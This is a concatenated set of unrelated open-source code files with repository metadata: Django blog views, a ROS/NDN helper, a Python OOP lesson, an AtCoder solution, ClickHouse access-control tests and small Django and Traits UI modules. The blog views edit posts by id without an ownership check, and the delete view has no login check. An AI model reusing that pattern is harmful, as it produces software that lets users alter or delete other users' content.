] | krantipaudyal@gmail.com |
9ab4ed47cb64a9963e3b6bcb5959c964797d8b3e | 71d406a01a0646c14e4a94491e73f148872a97ec | /blogs/views.py | 624e1838f7747473cce1e85b883b45fa154ec34e | [] | no_license | sriganesh/bearblog | db203ba463a8f83eb00eb4c1ff04657a3ff65c30 | a5900441ba94b70aad7d995e736ab424c0e0a619 | refs/heads/master | 2022-08-22T08:58:24.398971 | 2020-05-26T20:20:44 | 2020-05-26T20:20:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,319 | py | from django.contrib.auth import login, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from django.shortcuts import get_object_or_404, redirect, render
from django.views.generic.edit import DeleteView
from django.utils import timezone
from markdown import markdown
import tldextract
from .forms import BlogForm, PostForm
from .models import Blog, Post
from .helpers import *
def home(request):
http_host = request.META['HTTP_HOST']
if http_host == 'bearblog.dev' or http_host == 'localhost:8000':
return render(request, 'landing.html')
elif 'bearblog.dev' in http_host or 'localhost:8000' in http_host:
extracted = tldextract.extract(http_host)
blog = get_object_or_404(Blog, subdomain=extracted.subdomain)
root = get_root(extracted, blog.subdomain)
else:
blog = get_object_or_404(Blog, domain=http_host)
root = http_host
all_posts = Post.objects.filter(blog=blog, publish=True).order_by('-published_date')
nav = all_posts.filter(is_page=True)
posts = all_posts.filter(is_page=False)
content = markdown(blog.content)
return render(
request,
'home.html',
{
'blog': blog,
'content': content,
'posts': posts,
'nav': nav,
'root': root,
'meta_description': unmark(blog.content)[:160]
})
def posts(request):
http_host = request.META['HTTP_HOST']
if http_host == 'bearblog.dev' or http_host == 'localhost:8000':
return redirect('/')
elif 'bearblog.dev' in http_host or 'localhost:8000' in http_host:
extracted = tldextract.extract(http_host)
blog = get_object_or_404(Blog, subdomain=extracted.subdomain)
root = get_root(extracted, blog.subdomain)
else:
blog = get_object_or_404(Blog, domain=http_host)
root = http_host
all_posts = Post.objects.filter(blog=blog, publish=True).order_by('-published_date')
nav = all_posts.filter(is_page=True)
posts = all_posts.filter(is_page=False)
return render(
request,
'posts.html',
{
'blog': blog,
'posts': posts,
'nav': nav,
'root': root,
'meta_description': unmark(blog.content)[:160]
}
)
def post(request, slug):
http_host = request.META['HTTP_HOST']
if http_host == 'bearblog.dev' or http_host == 'localhost:8000':
return redirect('/')
elif 'bearblog.dev' in http_host or 'localhost:8000' in http_host:
extracted = tldextract.extract(http_host)
blog = get_object_or_404(Blog, subdomain=extracted.subdomain)
root = get_root(extracted, blog.subdomain)
else:
blog = get_object_or_404(Blog, domain=http_host)
root = http_host
all_posts = Post.objects.filter(blog=blog, publish=True).order_by('-published_date')
nav = all_posts.filter(is_page=True)
post = get_object_or_404(all_posts, slug=slug)
content = markdown(post.content)
return render(
request,
'post.html',
{
'blog': blog,
'content': content,
'post': post,
'nav': nav,
'root': root,
'meta_description': unmark(post.content)[:160]
}
)
@login_required
def dashboard(request):
extracted = tldextract.extract(request.META['HTTP_HOST'])
try:
blog = Blog.objects.get(user=request.user)
if extracted.subdomain and extracted.subdomain != blog.subdomain:
return redirect("{}/dashboard".format(get_root(extracted, blog.subdomain)))
message = ''
old_subdomain = blog.subdomain
old_domain = blog.domain
if request.method == "POST":
form = BlogForm(request.POST, instance=blog)
if form.is_valid():
blog_info = form.save(commit=False)
if blog_info.domain != old_domain:
delete_domain(old_domain)
if blog_info.domain:
add_new_domain(blog_info.domain)
message = f'Set the CNAME record for {blog_info.domain} to point at shaped-krill-fusn49u0rpoovwvgh0i6za5w.herokudns.com'
if blog_info.subdomain != old_subdomain:
blog_info.subdomain_id = update_dns_record(blog.subdomain_id, blog_info.subdomain)
message = 'It may take ~5 minutes to activate your new subdomain'
blog_info.save()
else:
form = BlogForm(instance=blog)
return render(request, 'dashboard/dashboard.html', {
'form': form,
'blog': blog,
'root': get_root(extracted, blog.subdomain),
'message': message
})
except Blog.DoesNotExist:
if request.method == "POST":
form = BlogForm(request.POST)
if form.is_valid():
blog = form.save(commit=False)
blog.user = request.user
blog.created_date = timezone.now()
blog.subdomain_id = create_dns_record(blog.subdomain)
if blog.domain:
add_new_domain(blog.domain)
blog.save()
return render(request, 'dashboard/dashboard.html', {
'form': form,
'blog': blog,
'root': get_root(extracted, blog.subdomain),
'message': 'It may take ~5 minutes to activate your new subdomain'
})
return render(request, 'dashboard/dashboard.html', {'form': form})
else:
form = BlogForm()
return render(request, 'dashboard/dashboard.html', {'form': form})
@login_required
def posts_edit(request):
extracted = tldextract.extract(request.META['HTTP_HOST'])
blog = get_object_or_404(Blog, user=request.user)
if extracted.subdomain and extracted.subdomain != blog.subdomain:
return redirect("{}/dashboard/posts".format(get_root(extracted, blog.subdomain)))
posts = Post.objects.filter(blog=blog).order_by('-published_date')
return render(request, 'dashboard/posts.html', {'posts': posts, 'blog': blog})
@login_required
def post_new(request):
extracted = tldextract.extract(request.META['HTTP_HOST'])
blog = get_object_or_404(Blog, user=request.user)
if extracted.subdomain and extracted.subdomain != blog.subdomain:
return redirect("{}/dashboard/posts/new".format(get_root(extracted, blog.subdomain)))
message = ''
if request.method == "POST":
form = PostForm(request.user, request.POST)
if form.is_valid():
post = form.save(commit=False)
post.blog = blog
post.published_date = timezone.now()
post.save()
return redirect(f"/dashboard/posts/{post.id}/")
else:
form = PostForm(request.user)
return render(request, 'dashboard/post_edit.html', {'form': form, 'blog': blog, 'message': message})
@login_required
def post_edit(request, pk):
extracted = tldextract.extract(request.META['HTTP_HOST'])
blog = get_object_or_404(Blog, user=request.user)
if extracted.subdomain and extracted.subdomain != blog.subdomain:
return redirect("{}/dashboard/posts".format(get_root(extracted, blog.subdomain)))
post = get_object_or_404(Post, pk=pk)
message = ''
if request.method == "POST":
form = PostForm(request.user, request.POST, instance=post)
if form.is_valid():
post = form.save(commit=False)
post.blog = blog
post.published_date = timezone.now()
post.save()
message = 'Saved'
else:
form = PostForm(request.user, instance=post)
return render(request, 'dashboard/post_edit.html', {
'form': form,
'blog': blog,
'post': post,
'root': get_root(extracted, blog.subdomain),
'message': message
})
class PostDelete(DeleteView):
model = Post
success_url = '/dashboard/posts'
def not_found(request, *args, **kwargs):
return render(request,'404.html', status=404) | [
"hfbmartinus@gmail.com"
] | hfbmartinus@gmail.com |
2060dd1eb8b6b28482c5449d396292c1ec40fab1 | b2a9df531ce9f29a481328abc48e363dfd76337d | /ndnrtc_stream/commands/base.py | c98ccf40cd9e4170085dba2d2f506bdde00e3e3c | [] | no_license | peetonn/ndnrtc-stream | 1901998e8f8484decf7f9b2e829b74f47f61dfcf | 3632c5fe91a14f8e0f67b519585beb53787693a8 | refs/heads/master | 2020-03-28T16:26:11.237276 | 2018-10-22T23:52:45 | 2018-10-22T23:52:45 | 148,694,770 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,603 | py | """The base command."""
from utils import *
from json import dumps
import logging, os, signal, sys, time, tempfile
logger = logging.getLogger(__name__)
class Base(object):
"""A base command."""
def __init__(self, options, *args, **kwargs):
global logger
checkNfdIsRunning()
self.options = options
self.args = args
self.kwargs = kwargs
if self.options["--verbose"]:
logging.basicConfig(level = logging.DEBUG)
else:
logging.basicConfig(level = logging.INFO)
ch = logging.StreamHandler(sys.stdout)
ch.setFormatter(CustomFormatter())
logger.propagate = False
logger.handlers = [ch]
logger.debug('cli options: %s'%dumps(self.options, indent=2, sort_keys=True))
# temp run directory
self.runDir = tempfile.mkdtemp(prefix='ndnrtc-stream.')
logger.debug("temporary runtime directory %s"%self.runDir)
signal.signal(signal.SIGINT, self.signal_handler)
def run(self):
raise NotImplementedError('You must implement the run() method yourself!')
def signal_handler(self, sig, frame):
logger.warn('caught stop signal...')
self.stopChildren()
def stopChildren(self):
logger.debug("stopping child processes...")
try:
for p in self.childrenProcs:
self.kill(p)
except:
pass
logger.debug("child processes stopped")
def kill(self, proc):
# os.kill(proc.pid, signal.SIGTERM)
if proc.poll() == None:
proc.terminate() | [
"gpeetonn@gmail.com"
] | gpeetonn@gmail.com |
3f4a3c4adb1d52cd5be7908542272346281dd5fd | 2209d0974c4e692669159209de62606667853b2e | /lesson/lesson06b.py | b796b5f7655d4db3e2750b342e9165aca1c525b2 | [] | no_license | g8gg/PythonLearning | 022f0e773881aef276ddf61ebe660cceb9476dfd | 2ae28caea50c152515d0f3d1ffcda2fad302dd48 | refs/heads/master | 2021-01-10T11:13:37.944765 | 2016-02-02T15:51:18 | 2016-02-02T15:51:18 | 47,162,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,105 | py | # Object & Class
# Lesson 06 b
# Class method & Static method
# Polymorphic
# named tuple 命名元组
from collections import namedtuple
from this import s
import codecs
print('rot-13', "-" * 70)
print(s) # rot13 encoding !
print("-" * 80)
print(codecs.decode(s, "rot-13"))
class A:
count = 0
def __init__(self):
A.count += 1
def exclaim(self):
print('I\'m an A!')
@classmethod
def kids(cls):
print("A has", cls.count, "little objects.")
easy_a = A()
easy_b = A()
easy_c = A()
easy_d = A()
easy_a.count = 0
easy_b.count = 1
easy_c.count = 2
easy_d.count = 3
print(easy_a.count)
print(easy_b.count)
print(easy_c.count)
print(easy_d.count)
print(A.count)
# Class Method (keep class attribute)
# A.count = cls.count, not the self.count (instance attribute)
easy_a.kids()
easy_b.kids()
easy_c.kids()
easy_d.kids()
A.kids()
# Static Method
class CoyoteWeapon:
@staticmethod # 静态方法只是属于类的定义,不属于类(Class or cls)也不属于实例
def commercial(): # no self, no everything
print('This CoyoteWeapon has been brought to you by Acme')
CoyoteWeapon.commercial()
# Duck Typing
class Quote:
def __init__(self, person, words):
self.person = person
self.words = words
def who(self):
return self.person
def says(self):
return self.words + '.'
class QuestionQuote(Quote):
def says(self):
return self.words + '?'
class ExclamationQuote(Quote):
def says(self):
return self.words + '!'
hunter = Quote('G8GG', 'Python is good')
print(hunter.who(), 'says:', hunter.says())
hunted = QuestionQuote('Bugs Bunny', 'What\'s up, dc')
print(hunted.who(), 'says:', hunted.says())
hunted1 = ExclamationQuote('Daffy Duck', 'It\'s rabbit season')
print(hunted1.who(), 'says:', hunted1.says())
print('-' * 80)
# 多态
# 面向对象的三大特性:封装、继承、多态
# 从一定角度来看,封装和继承几乎都是为多态而准备的
# 多态存在的三个必要条件
# 一、要有继承;
# 二、要有重写;
# 三、父类引用指向子类对象
# 实现多态的技术称为:动态绑定(dynamic binding),是指在执行期间判断所引用对象的实际类型,根据其实际的类型调用其相应的方法
# 多态的作用:消除类型之间的耦合关系
def who_says(obj): # Duck Typing
print(obj.who(), 'says', obj.says())
who_says(hunter)
who_says(hunted)
who_says(hunted1)
# magic method / special method
class Word:
def __init__(self, text):
self.text = text
def __str__(self):
return self.text
def __repr__(self):
return 'Word→' + self.text
first = Word('Majun')
print(first) # use __str__
""" Run in Python Console
>>> class Word:
def __init__(self, text):
self.text = text
def __str__(self):
return self.text
def __repr__(self):
return 'Word→' + self.text
>>> first = Word('test')
>>> first # use __repr__
Word→test
"""
print("-" * 80)
# Class and Named Tuple
# class
# is-a关系用继承, has-a关系考虑组合(composition)和聚合(aggregation)
class Bill:
def __init__(self, description):
self.description = description
class Tail:
def __init__(self, length):
self.length = length
class Duck:
def __init__(self, bill, tail):
self.bill = bill
self.tail = tail
def about(self):
print('This duck has a', self.bill.description, 'bill and a', self.tail.length, 'tail')
tail = Tail('long')
bill = Bill('wide orange')
duck = Duck(bill, tail)
duck.about()
# named tuple
# 命名元组的使用,三种初始化方法
Duck1 = namedtuple('Duck', 'bill tail')
duck1 = Duck1('wide orange', 'long')
print(duck1)
print(duck1.bill, duck1.tail)
# named tuple constructed by dictionary {}
parts = {'bill': 'wide orange', 'tail': 'long'} # **parts是关键词变量(keyword argument),抽取出key-value供Duck1()使用
duck2 = Duck1(**parts)
print(duck2)
# print(duck2.bill, duck2.tail)
duck3 = Duck1(bill='wide orange 3', tail='long 3') # 作用同上
print(duck3)
# print(duck3.bill, duck3.tail)
# 命名元组是不可变的,但是可以修改某些域的值并返回一个新的命名元组,不同于字典Dict
duck_dict = {'bill': 'wide orange', 'tail': 'long'}
duck_dict['color'] = 'red' # dict add new K-V pair
print(duck_dict)
# duck3.bill='test' # can't set attribute
duck4 = duck1._replace(bill='crushing', tail='magnificent')
print(duck4)
# duck4.color="red" # AttributeError: 'Duck' object has no attribute 'color'
# 命名元组的好处
Settings = namedtuple('App', 'AppName Version Author MD5Sign Major Minor Build')
my_app_settings = Settings('App1', '1.0', 'G8GG', 'xxxxxxxxxx', '1', '01', '1212')
print(my_app_settings.AppName)
Settings.AppName = "App2"
# Settings.
print(my_app_settings.AppName)
Point = namedtuple('Point', ['x', 'y'])
p = Point(11, y=12)
print(p)
x, y = p
print(x, y)
a = [{"a": "a"}, {"bb": 1}]
# print(a.)
import pandas as pd
# import numpy as np
tmp = pd.DataFrame(a)
# tmp.
| [
"fomalhaut@gmail.com"
] | fomalhaut@gmail.com |
8a2eb7cfab390a2f709d7eb3419c08fa0e6dd095 | 0eb599c3bbfa6e5b31516913b88cc9db3a1311ce | /ABC_6q/abc169f.py | ad9eed03c6ee61e3f204ed1ab80452f68d22e136 | [] | no_license | Linus-MK/AtCoder | 5b84dc88c2d2773d0f97ed18265d303290da7879 | a587e89a9e0c2ab4d36b09176bcc95e901e14326 | refs/heads/master | 2022-11-25T05:37:12.148722 | 2022-11-17T16:04:10 | 2022-11-17T16:04:10 | 169,840,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | n, s = list(map(int, input().split()))
nums = list(map(int, input().split()))
dp = [[0 for i in range(s+1)] for j in range(n+1)]
mod = 998244353
dp[0][0] = 1
for i in range(n):
for summ in range(s+1):
if summ - nums[i] >= 0:
dp[i+1][summ] = (2 * dp[i][summ] + dp[i][summ - nums[i]]) % mod
else:
dp[i+1][summ] = (2 * dp[i][summ]) % mod
# print(dp)
print(dp[n][s] % mod) | [
"13600386+Linus-MK@users.noreply.github.com"
] | 13600386+Linus-MK@users.noreply.github.com |
6cec2962afd83940865d9b5121ea405fb2a72374 | c5dae77bb3ec7b39dca5c5c0522e101c4cb6d5a8 | /rooms/permissions.py | 8e1b5f8ec4de3e3507e9a1b899d0fbe75120a6cc | [] | no_license | Parkyes90/airbnb-api | f0726018738aad8eaf4ea891bb3de076ad875a36 | f80864757433d0ea0421b2f47d2daab9cf02915f | refs/heads/master | 2023-04-28T21:53:31.687273 | 2022-12-24T01:38:24 | 2022-12-24T01:38:24 | 243,207,499 | 0 | 0 | null | 2023-08-17T17:23:51 | 2020-02-26T08:19:24 | Python | UTF-8 | Python | false | false | 320 | py | from rest_framework.permissions import BasePermission
class IsOwner(BasePermission):
def has_object_permission(self, request, view, obj):
if not hasattr(obj, "user"):
raise Exception("해당 모델이 사용자 필드를 가지고 있지 않습니다.")
return obj.user == request.user
| [
"parkyes90@gmail.com"
] | parkyes90@gmail.com |
f6a713af97406d8dfa4ac81eebb0b71130ec20fe | e80c5a1f6073a24d59bdce3bcf00935320502c13 | /tests/integration/test_create_user_and_login/test.py | e1bc99ca75bffdccc08e23e636441c376bede7d9 | [
"Apache-2.0"
] | permissive | manmitya/ClickHouse | 3284828935099dc395da41c7d6c81f506b04d144 | 85e260286651bd6151d1e18f6f7a5160df300cd0 | refs/heads/master | 2022-11-10T09:57:06.882929 | 2020-07-02T21:57:41 | 2020-07-02T21:57:41 | 276,752,421 | 0 | 0 | Apache-2.0 | 2020-07-02T21:55:36 | 2020-07-02T21:55:35 | null | UTF-8 | Python | false | false | 5,696 | py | import pytest
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
import re
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance')
@pytest.fixture(scope="module", autouse=True)
def started_cluster():
try:
cluster.start()
instance.query("CREATE DATABASE test")
instance.query("CREATE TABLE test.table(x UInt32, y UInt32) ENGINE = MergeTree ORDER BY tuple()")
instance.query("INSERT INTO test.table VALUES (1,5), (2,10)")
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def cleanup_after_test():
try:
yield
finally:
instance.query("DROP USER IF EXISTS A, B")
instance.query("DROP TABLE IF EXISTS default.table")
def test_login():
instance.query("CREATE USER A")
instance.query("CREATE USER B")
assert instance.query("SELECT 1", user='A') == "1\n"
assert instance.query("SELECT 1", user='B') == "1\n"
def test_grant_and_revoke():
instance.query("CREATE USER A")
assert "Not enough privileges" in instance.query_and_get_error("SELECT * FROM test.table", user='A')
instance.query('GRANT SELECT ON test.table TO A')
assert instance.query("SELECT * FROM test.table", user='A') == "1\t5\n2\t10\n"
instance.query('REVOKE SELECT ON test.table FROM A')
assert "Not enough privileges" in instance.query_and_get_error("SELECT * FROM test.table", user='A')
def test_grant_option():
instance.query("CREATE USER A")
instance.query("CREATE USER B")
instance.query('GRANT SELECT ON test.table TO A')
assert instance.query("SELECT * FROM test.table", user='A') == "1\t5\n2\t10\n"
assert "Not enough privileges" in instance.query_and_get_error("GRANT SELECT ON test.table TO B", user='A')
instance.query('GRANT SELECT ON test.table TO A WITH GRANT OPTION')
instance.query("GRANT SELECT ON test.table TO B", user='A')
assert instance.query("SELECT * FROM test.table", user='B') == "1\t5\n2\t10\n"
instance.query('REVOKE SELECT ON test.table FROM A, B')
def test_introspection():
instance.query("CREATE USER A")
instance.query("CREATE USER B")
instance.query('GRANT SELECT ON test.table TO A')
instance.query('GRANT CREATE ON *.* TO B WITH GRANT OPTION')
assert instance.query("SHOW USERS") == TSV([ "A", "B", "default" ])
assert instance.query("SHOW CREATE USERS A") == TSV([ "CREATE USER A" ])
assert instance.query("SHOW CREATE USERS B") == TSV([ "CREATE USER B" ])
assert instance.query("SHOW CREATE USERS A,B") == TSV([ "CREATE USER A", "CREATE USER B" ])
assert instance.query("SHOW CREATE USERS") == TSV([ "CREATE USER A", "CREATE USER B", "CREATE USER default IDENTIFIED WITH plaintext_password SETTINGS PROFILE default" ])
assert instance.query("SHOW GRANTS FOR A") == TSV([ "GRANT SELECT ON test.table TO A" ])
assert instance.query("SHOW GRANTS FOR B") == TSV([ "GRANT CREATE ON *.* TO B WITH GRANT OPTION" ])
assert instance.query("SHOW GRANTS FOR A,B") == TSV([ "GRANT SELECT ON test.table TO A", "GRANT CREATE ON *.* TO B WITH GRANT OPTION" ])
assert instance.query("SHOW GRANTS FOR B,A") == TSV([ "GRANT SELECT ON test.table TO A", "GRANT CREATE ON *.* TO B WITH GRANT OPTION" ])
assert instance.query("SHOW GRANTS FOR ALL") == TSV([ "GRANT SELECT ON test.table TO A", "GRANT CREATE ON *.* TO B WITH GRANT OPTION", "GRANT ALL ON *.* TO default WITH GRANT OPTION" ])
assert instance.query("SHOW GRANTS", user='A') == TSV([ "GRANT SELECT ON test.table TO A" ])
assert instance.query("SHOW GRANTS", user='B') == TSV([ "GRANT CREATE ON *.* TO B WITH GRANT OPTION" ])
expected_access1 = "CREATE USER A\n"\
"CREATE USER B\n"\
"CREATE USER default IDENTIFIED WITH plaintext_password SETTINGS PROFILE default"
expected_access2 = "GRANT SELECT ON test.table TO A\n"\
"GRANT CREATE ON *.* TO B WITH GRANT OPTION\n"\
"GRANT ALL ON *.* TO default WITH GRANT OPTION\n"
assert expected_access1 in instance.query("SHOW ACCESS")
assert expected_access2 in instance.query("SHOW ACCESS")
assert instance.query("SELECT name, storage, auth_type, auth_params, host_ip, host_names, host_names_regexp, host_names_like, default_roles_all, default_roles_list, default_roles_except from system.users WHERE name IN ('A', 'B') ORDER BY name") ==\
TSV([[ "A", "disk", "no_password", "[]", "['::/0']", "[]", "[]", "[]", 1, "[]", "[]" ],
[ "B", "disk", "no_password", "[]", "['::/0']", "[]", "[]", "[]", 1, "[]", "[]" ]])
assert instance.query("SELECT * from system.grants WHERE user_name IN ('A', 'B') ORDER BY user_name, access_type, grant_option") ==\
TSV([[ "A", "\N", "SELECT", "test", "table", "\N", 0, 0 ],
[ "B", "\N", "CREATE", "\N", "\N", "\N", 0, 1 ]])
def test_current_database():
instance.query("CREATE USER A")
instance.query("GRANT SELECT ON table TO A", database="test")
assert instance.query("SHOW GRANTS FOR A") == TSV([ "GRANT SELECT ON test.table TO A" ])
assert instance.query("SHOW GRANTS FOR A", database="test") == TSV([ "GRANT SELECT ON test.table TO A" ])
assert instance.query("SELECT * FROM test.table", user='A') == "1\t5\n2\t10\n"
assert instance.query("SELECT * FROM table", user='A', database='test') == "1\t5\n2\t10\n"
instance.query("CREATE TABLE default.table(x UInt32, y UInt32) ENGINE = MergeTree ORDER BY tuple()")
assert "Not enough privileges" in instance.query_and_get_error("SELECT * FROM table", user='A')
| [
"vitbar@yandex-team.ru"
] | vitbar@yandex-team.ru |
ec400920cda9509c5c17882288afd3c75cf06cba | 73da198ccfca2d0d77b7c48399fc051d180cdeb6 | /main.py | 82672ba635aa06e8f148a83eb7fbb92557b4535f | [] | no_license | nfsrules/AxionautV1 | 186a2f397ec903a8ab27eecebbb9c8dee973d7c8 | 2fbd69ae1d5c880bca47363bb8460e7d97d0aa00 | refs/heads/master | 2020-03-07T14:54:39.769936 | 2018-04-09T08:56:02 | 2018-04-09T08:56:02 | 127,539,420 | 1 | 0 | null | 2018-03-31T14:30:08 | 2018-03-31T14:30:07 | null | UTF-8 | Python | false | false | 3,723 | py | # coding=utf-8
import os
import sys
sys.path.append('Modules/')
sys.path.append('Databases/')
sys.path.append('Architectures/')
sys.path.append('Models/')
from utils import load_autopilot, get_commands
import architectures
import vehicles
import argparse
import warnings
warnings.filterwarnings("ignore")
models_path = '/Models'
parser = argparse.ArgumentParser(description='Axionaut')
parser.add_argument('--mode', default='self_driving', help='self_driving, records or training') # PoSelf driving, Record, Training
parser.add_argument('--architecture', default='ConvNets', help='ConvNets or ConvLSTM')
parser.add_argument('--tl', default='transfer_learning', help='Weights initialization - Random or Transfer Learning')
parser.add_argument('-e', '--epochs', default=150, type=int)
parser.add_argument('-b', '--batch_size', default=64, type=int)
parser.add_argument('-op', '--optimizer', default='Adam')
args = parser.parse_args()
if (args.mode == 'self_driving'):
print('Vehicle started in self driving mode.')
# Load self-driving pre-train model
model, graph = load_autopilot('autopilot.hdf5')
print('Model loaded...')
# Create Axionaut car with default settings
axionaut = vehicles.Axionaut()
# Configure PDW control commands as default
axionaut.commands = get_commands(path=None, default=True)
# Test camera position
axionaut.camera_test()
print('Hardware configured...')
# Set Axionaut to auto pilot mode / Wrap driving model to vehicle
axionaut.autopilot(model, graph)
# Start Axtionaut :)
raw_input('Self self_driving started. Pres any key to start driving. Press Crtl + C to exit.')
axionaut.start()
elif(args.mode == 'training'):
print('Vehicle started in training mode.')
# Create Axionaut car with default settings
axionaut = Axionaut()
# Configure PDW control commands as default
axionaut.commands = get_commands(path=None, default=True)
# Training mode started with Transfer Learning
if (args.tl == True):
# Load self-driving pre-trained model
model, graph = load_model('autopilot.hdf5')
# Freeze all convolutional layers
for layer in model.layers:
layer.trainable = False
# Training routine
print('Training routine started with transfer learning. Press Crtl + C to exit.')
history = axionaut.train(model, graph, transfer_learning=True,
epochs=args.epochs,
batch_size=args.batch_size,
optimizer=args.optimizer)
utils.plot_train_loss(history)
print('trained finished. Best model saved')
else:
if args.arch == 'ConvNets':
# Create a new ConvNet model from library
model = architectures.ConvNets()
# Train model
history = model.train(model, graph, transfer_learning=True,
epochs=args.epochs,
batch_size=args.batch_size,
optimizer=args.optimizer)
utils.plot_train_loss(history)
print('trained finished. Best model saved')
else:
# Create a new ConvNet model from library
model = architectures.ConvNets()
# Train model
history = model.train(model, graph, transfer_learning=True,
epochs=args.epochs,
batch_size=args.batch_size,
optimizer=args.optimizer)
print('Architecture ConvLSTM')
else:
print('Vehicle started in Record model')
| [
"nelson.fernandez@axionable.com"
] | nelson.fernandez@axionable.com |
a84b905e0ab1f6527347ae02f73f29c344cdc327 | 243833b82131b1d45d54df72a1a6772f5497c904 | /Tree/matrix to Tree.py | 27966c2362042228f939a9533e737b10bbfed901 | [] | no_license | Kumarved123/Basic-Data-Structure-Algorithm | e0c874c5ef2b5617449496887226d2816428e5ef | f2ba838472a484e982848dff3ee44cd38cd669cd | refs/heads/master | 2020-05-19T03:15:45.289941 | 2020-01-19T17:06:43 | 2020-01-19T17:06:43 | 184,795,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | class Node:
def __init__(self, data):
self.data = data
self.left = None
self.right = None
def findroot(matrix):
n = len(matrix)
zero = [0]*n
for i in range(n):
if matrix[i] == zero:
return i
def Tree(matrix):
n = len(matrix)
root = findroot(matrix)
def dfsUtil(matrix, stack, n, root):
if len(stack) == 0:
return
s = stack[-1]
i = 0
while i < n and matrix[s][i] !=1:
i+=1
if i < n:
stack.append(i)
matrix[s][i] = 0
if not root.left:
root.left = Node(i)
dfsUtil(matrix, stack, n, root.left)
elif not s.right:
root.right = Node(i)
dfsUtil(matrix, stack, n, root.right)
else:
dfsUtil(matrix, stack, n)
def DFS(matrix, s):
stack = []
root = Node(s)
n = len(matrix)
stack.append(s)
dfsUtil(matrix, stack, n, root)
| [
"vkumar@ar.iitr.ac.in"
] | vkumar@ar.iitr.ac.in |
9be35d2a711c8eb0700d7ddfc54912967c9d4596 | ff81a9d7880f1b85a1dc19d5eba5ac72d7179c86 | /pychron/options/views/flux_visualization_views.py | 208b66906956dcd975359ab479acc112319b92dd | [
"Apache-2.0"
] | permissive | UManPychron/pychron | 2fb7e479a9f492423c0f458c70102c499e1062c4 | b84c9fd70072f9cbda30abe2c471e64fe3dd75d8 | refs/heads/develop | 2022-12-03T23:32:45.579326 | 2020-01-29T19:02:20 | 2020-01-29T19:02:20 | 36,100,637 | 0 | 0 | null | 2015-05-23T00:10:06 | 2015-05-23T00:10:05 | null | UTF-8 | Python | false | false | 2,220 | py | # ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from chaco.default_colormaps import color_map_name_dict
from traitsui.api import Item, HGroup, VGroup, EnumEditor
from pychron.options.options import SubOptions, AppearanceSubOptions
class FluxVisualizationSubOptions(SubOptions):
def traits_view(self):
grp = VGroup(Item('plot_kind'),
Item('model_kind'))
return self._make_view(grp)
class FluxVisualizationAppearanceSubOptions(AppearanceSubOptions):
def traits_view(self):
twodgrp = VGroup(HGroup(Item('color_map_name',
label='Color Map',
editor=EnumEditor(values=sorted(color_map_name_dict.keys()))),
Item('levels')),
visible_when='plot_kind=="2D"',
label='Options',
show_border=True)
onedgrp = VGroup(Item('marker_size'),
visible_when='plot_kind=="1D"',
label='Options',
show_border=True)
scalegrp = VGroup(Item('flux_scalar', label='Scale', tooltip='Multiple flux by Scale. FOR DISPLAY ONLY'))
return self._make_view(VGroup(twodgrp, onedgrp, scalegrp))
VIEWS = {'main': FluxVisualizationSubOptions,
'appearance': FluxVisualizationAppearanceSubOptions}
# ============= EOF =============================================
| [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
1cb53ce92897d65d05b8eb78e9534d4bee7e0ba5 | 0fd9644616b5658ea960ef86f28b94cc95ce55e0 | /djangoprj/mikrotik/migrations/0005_mtusers.py | 744c7b72dff4e87a2d85c4bf78cfde2cdfeb1802 | [] | no_license | zdimon/time-control | f4db6f26f15a18c89b91dba3f69a696a9d3a6c28 | 3a212d26dcaae13d3ca5a18247a425f63938fd7c | refs/heads/master | 2020-05-13T16:33:53.011992 | 2019-04-19T07:05:01 | 2019-04-19T07:05:01 | 181,640,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | # Generated by Django 2.2 on 2019-04-17 07:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mikrotik', '0004_auto_20190417_0640'),
]
operations = [
migrations.CreateModel(
name='MTUsers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip', models.CharField(max_length=250)),
('host', models.CharField(max_length=250)),
('mac', models.CharField(max_length=250)),
],
),
]
| [
"zdimon@example.com"
] | zdimon@example.com |
ccbb30f2c4537be943b2123987f1b949590019ab | 4fd5415bc03bd03ecfd44bfc4160a2f7712b594e | /build/rosserial_embeddedlinux/catkin_generated/pkg.installspace.context.pc.py | ff6f007b1e60d030a434f140b8946315d75348c3 | [] | no_license | z0sani/R-York | 772beb715edbb942882dcf43cb9cd8c090f5d2cf | bac7758c2b89764e3208e5899d2b3c8820af370a | refs/heads/master | 2020-03-28T06:31:17.660568 | 2018-09-07T15:35:30 | 2018-09-07T15:35:30 | 147,840,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rosserial_embeddedlinux"
PROJECT_SPACE_DIR = "/home/swarmie/RMC/install"
PROJECT_VERSION = "0.7.7"
| [
"matthew@fricke.co.uk"
] | matthew@fricke.co.uk |
